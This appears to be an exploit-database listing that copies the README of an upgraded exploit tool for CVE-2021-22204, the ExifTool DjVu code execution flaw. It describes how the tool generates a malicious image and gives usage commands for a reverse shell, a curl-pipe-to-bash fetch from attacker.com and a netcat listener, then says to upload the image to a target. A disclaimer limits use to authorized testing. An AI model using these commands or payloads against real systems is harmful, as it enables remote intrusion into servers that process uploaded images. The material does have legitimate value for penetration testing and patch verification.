Exploit for Code Injection in Exiftool_Project Exiftool CVE-2021-22204

Name: Exploit for Code Injection in Exiftool_Project Exiftool CVE-2021-22204
Rating: 5 (13 reviews)
2026-06-13 | CVSS 7.8
## https://sploitus.com/exploit?id=A0F6718E-3F97-524C-8420-8BD056FE6751
# CVE-2021-22204 - ExifTool Arbitrary Code Execution

An upgraded exploit for CVE-2021-22204, a vulnerability in ExifTool versions 7.44 through 12.23 that allows arbitrary code execution when processing malicious DjVu files.

## Description

Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 to 12.23 allows arbitrary code execution when parsing a malicious image. This exploit generates a malicious image file that, when processed by a vulnerable ExifTool version, executes attacker-controlled code.

## Improvements Over Original

This is an upgraded version inspired by [UNICORDev/exploit-CVE-2021-22204](https://github.com/UNICORDev/exploit-CVE-2021-22204), with the following improvements:

- **No ExifTool dependency on attacker machine** - The original exploit uses `exiftool -config` to embed the payload, which fails if your ExifTool is patched (v12.24+). This version creates a pure DjVu payload using only `djvumake`.
- **Works on modern Kali** - Compatible with Python 3.12+ (fixes `\c` escape sequence warning)
- **Minimal dependencies** - Only requires `djvulibre-bin` package
- **Clean, minimal code** - No ASCII art or artificial delays

## Requirements

```bash
sudo apt install djvulibre-bin
```

## Usage

**Reverse Shell:**
```bash
python3 exploit.py -s  
```

**Custom Command:**
```bash
python3 exploit.py -c "id > /tmp/pwned"
```

**Examples:**
```bash
# Generate reverse shell payload
python3 exploit.py -s 192.168.1.100 4444

# Generate command execution payload  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# Start listener and wait for callback
nc -nlvp 4444
```

The exploit generates `image.jpg` - upload this to a target where ExifTool will process it.

## Affected Versions

- ExifTool 7.44 - 12.23

## References

- [CVE-2021-22204](https://nvd.nist.gov/vuln/detail/CVE-2021-22204)
- [ExifTool Advisory](https://exiftool.org/history.html#12.24)
- [Original UNICORD Exploit](https://github.com/UNICORDev/exploit-CVE-2021-22204)

## Disclaimer

This tool is provided for **educational and authorized security testing purposes only**.

The author is not responsible for any misuse or damage caused by this tool. Only use this exploit against systems you own or have explicit written permission to test.

Unauthorized access to computer systems is illegal and punishable by law. Use responsibly.

## License

MIT License - See [LICENSE](LICENSE) file.

## Credits

- Original exploit concept by [UNICORD (NicPWNs & Dev-Yeoj)](https://github.com/UNICORDev/exploit-CVE-2021-22204)
- Upgraded version by [d4ytox](https://github.com/d4ytox)